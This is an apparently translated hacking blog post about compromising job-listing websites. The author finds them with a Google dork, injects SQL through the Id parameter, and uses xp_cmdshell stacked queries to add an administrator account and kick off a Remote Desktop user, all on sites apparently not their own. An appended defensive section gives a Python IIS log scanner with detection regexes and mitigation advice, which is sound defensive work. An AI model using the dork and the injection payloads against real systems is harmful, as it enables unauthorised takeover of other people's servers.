Alimail
A boring test. There was a power outage for the past few days and it was hard to get any electricity. I quickly pulled out the source code and, after a brief look, found an injection point, then went to Google to practice. I am publishing the write-up here. Google: inurl:com_job_list1.asp?Id can be injected. It is the source code of a talent (job-listing) network. Find an injection point. When checked with Ah D (the injection tool), the database login turns out to have sa permissions. I remember someone saying that a website without sa permissions only shows your own technical problems.
Since it has sa permissions, I certainly can't let it go. After trying to list the directory, I found that I couldn't. At this point I thought of xp_cmdshell. Because Ah D did not show any output, I tested it manually.
Submit http://www.xxx.com/com_job_list1.asp?Id=6228 and 1=(select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell')
It returns normally.
Hurry and add an account first: http://www.xxx.com/com_job_list1.asp?Id=6228;exec master.dbo.xp_cmdshell 'net user shaun 111 /add';--
Add it to the Administrators group:
http://www.xxx.com/com_job_list1.asp?Id=6228;exec master.dbo.xp_cmdshell 'net localgroup administrators shaun /add';--
Remote Desktop connects, but the login prompts "The remote server has exceeded the maximum number of allowed connections". Damn it, kick one off: http://www.xxx.com/com_job_list1.asp?Id=6228;exec master.dbo.xp_cmdshell 'logoff 1';--
This time you can log on normally.
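From the defender's side, every step of the sequence above (the sysobjects probe, the stacked xp_cmdshell calls, the local account creation and the forced logoff) travels in the query string of a GET request, so it lands in the web server log. The following is an added example, not code from the original post: a small scanner that normalises the cs-uri-query field of W3C-style IIS log lines and classifies each request against the stages of this attack. The log lines, the W3C field order, the IP addresses and the rule names are constructed for illustration.

```python
"""Flag the injection sequence described in the post in IIS-style web logs.

Added example, not part of the original post. The sample log, the field order
(date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status), the
addresses and the rule names are all constructed for this demonstration.
"""
import re
from urllib.parse import unquote_plus

# Each rule is (stage name, regex) and is matched against the decoded,
# whitespace-collapsed, lower-cased query string.
RULES = [
    # Boolean probe: "and 1=(select count(*) from master.dbo.sysobjects ...)"
    ("sysobjects_probe",
     re.compile(r"select\s+count\s*\(\s*\*\s*\)\s+from\s+master\s*\.\s*(dbo\s*\.\s*)?sysobjects")),
    # Stacked query calling the extended stored procedure
    ("stacked_xp_cmdshell",
     re.compile(r";\s*exec\s+(master\s*\.\s*(dbo\s*\.\s*)?)?xp_cmdshell")),
    # Local account creation or group membership change via "net ... /add"
    ("local_account_change",
     re.compile(r"\bnet\s+(user|localgroup)\b.*/add\b")),
    # Forced session logoff, used to free a Remote Desktop slot
    ("session_logoff",
     re.compile(r"xp_cmdshell\b.*\blogoff\s+\d+")),
]


def normalize(query):
    """Decode %xx and '+', collapse whitespace, lower-case (defeats spacing/case tricks)."""
    decoded = unquote_plus(query)
    return re.sub(r"\s+", " ", decoded).strip().lower()


def classify(query):
    """Return the list of stage names whose rule matches this query string."""
    q = normalize(query)
    return [name for name, rx in RULES if rx.search(q)]


def scan_iis_log(lines):
    """Return [(cs-uri-stem, [stages])] for every log line that triggers a rule."""
    findings = []
    for line in lines:
        if not line or line.startswith("#"):   # skip directives such as #Fields
            continue
        parts = line.split(" ")
        if len(parts) < 6:
            continue
        stem, query = parts[4], parts[5]
        hits = classify(query)
        if hits:
            findings.append((stem, hits))
    return findings


def stages_seen(lines):
    """Distinct stages in the order they first appear: shows how far the attacker got."""
    seen = []
    for _, hits in scan_iis_log(lines):
        for stage in hits:
            if stage not in seen:
                seen.append(stage)
    return seen


# Constructed sample log reproducing the requests from the post (placeholder hosts).
SAMPLE_LOG = """#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port c-ip sc-status
2012-01-01 10:00:01 10.0.0.5 GET /com_job_list1.asp Id=6228 80 203.0.113.7 200
2012-01-01 10:00:09 10.0.0.5 GET /com_job_list1.asp Id=6228+and+1=(select+count(*)+from+master.dbo.sysobjects+where+xtype='x'+and+name='xp_cmdshell') 80 203.0.113.7 200
2012-01-01 10:00:31 10.0.0.5 GET /com_job_list1.asp Id=6228;exec+master.dbo.xp_cmdshell+'net+user+shaun+111+/add';-- 80 203.0.113.7 200
2012-01-01 10:00:40 10.0.0.5 GET /com_job_list1.asp Id=6228;exec+master.dbo.xp_cmdshell+'net+localgroup+administrators+shaun+/add';-- 80 203.0.113.7 200
2012-01-01 10:05:02 10.0.0.5 GET /com_job_list1.asp Id=6228;exec+master.dbo.xp_cmdshell+'logoff+1';-- 80 203.0.113.7 200
""".splitlines()


if __name__ == "__main__":
    for stem, hits in scan_iis_log(SAMPLE_LOG):
        print(stem, hits)
    print("progression:", stages_seen(SAMPLE_LOG))
```

The first sample line (a plain numeric Id) produces no hit, which is the point of anchoring the rules on the SQL and shell fragments rather than on the parameter itself. Seeing stacked_xp_cmdshell at all means the application's database login could execute an extended stored procedure; the mitigation is the one the post's own "sa permission" remark implies in reverse: run the site under a low-privilege login, parameterise the Id query, and leave xp_cmdshell disabled via sp_configure.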